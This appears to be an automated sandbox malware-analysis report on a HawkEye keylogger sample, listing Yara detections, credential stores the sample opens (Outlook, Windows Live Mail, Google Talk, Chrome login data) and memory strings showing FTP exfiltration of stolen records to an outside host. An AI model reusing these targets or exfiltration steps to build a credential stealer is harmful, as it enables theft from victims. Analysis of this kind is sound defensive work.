                  Source: C:\Users\user\Desktop\tDb0ggawON.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,14_2_0041604B
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00407674 GetVersionExW,14_2_00407674
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,15_2_0040724C
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: tDb0ggawON.exe, 0000000B.00000002.520275691.00000000073DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MailPassView
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.45fa72.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.630ecaa.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.19.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.4009930.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.23.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.4009930.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000000.337528444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000000.337820875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000000.337259386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 5752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 3536, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2272, type: MEMORYSTR
                  Yara detected HawkEye Keylogger
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.302b2a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 5752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 3536, type: MEMORYSTR
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword15_2_00402D9A
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword15_2_00402D9A
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword15_2_004033D7
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: 14.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.409c0d.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.18.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b8e45.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.4021b50.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.4021b50.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.4009930.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.22.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000000.336146363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 5752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 3536, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1632, type: MEMORYSTR
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

                  Remote Access Functionality

                  barindex
                  Yara detected HawkEye Keylogger
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.302b2a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 5752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 3536, type: MEMORYSTR
                  Detected HawkEye Rat
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                  Source: tDb0ggawON.exe, 0000000B.00000002.520275691.00000000073DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tp://ctlmanchutimefashion.com/HawkEye_Keylog~/
                  Source: tDb0ggawON.exe, 0000000B.00000002.520275691.00000000073DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.manchutimefashion.com/HawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txt
                  Source: tDb0ggawON.exe, 0000000B.00000002.518121417.0000000003230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: mAHawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txt
                  Source: tDb0ggawON.exe, 0000000B.00000002.518121417.0000000003230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: maftp://ftp.manchutimefashion.com/HawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txt
                  Source: tDb0ggawON.exe, 0000000B.00000002.518121417.0000000003230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.manchutimefashion.com/HawkEye_Keylogger_Stealer_Records_287400%202.14.2022%209:51:52%20AM.txt
                  Source: tDb0ggawON.exe, 0000000B.00000002.518121417.0000000003230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: mgftp://ftp.manchutimefashion.com/HawkEye_Keylogger_Stealer_Records_287400%202.14.2022%209:51:52%20AM.txt
                  Source: tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HawkEyeKeylogger
                  Source: tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: m&HawkEye_Keylogger_Execution_Confirmed_
                  Source: tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: m"HawkEye_Keylogger_Stealer_Records_
                  Source: tDb0ggawON.exe, 0000000B.00000002.518137618.000000000323E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: mAHawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txtP
                  Source: tDb0ggawON.exe, 0000000B.00000002.518137618.000000000323E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: mHSTOR HawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txt
                  Source: tDb0ggawON.exe, 0000000B.00000002.518137618.000000000323E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txt

                  Mitre Att&ck Matrix

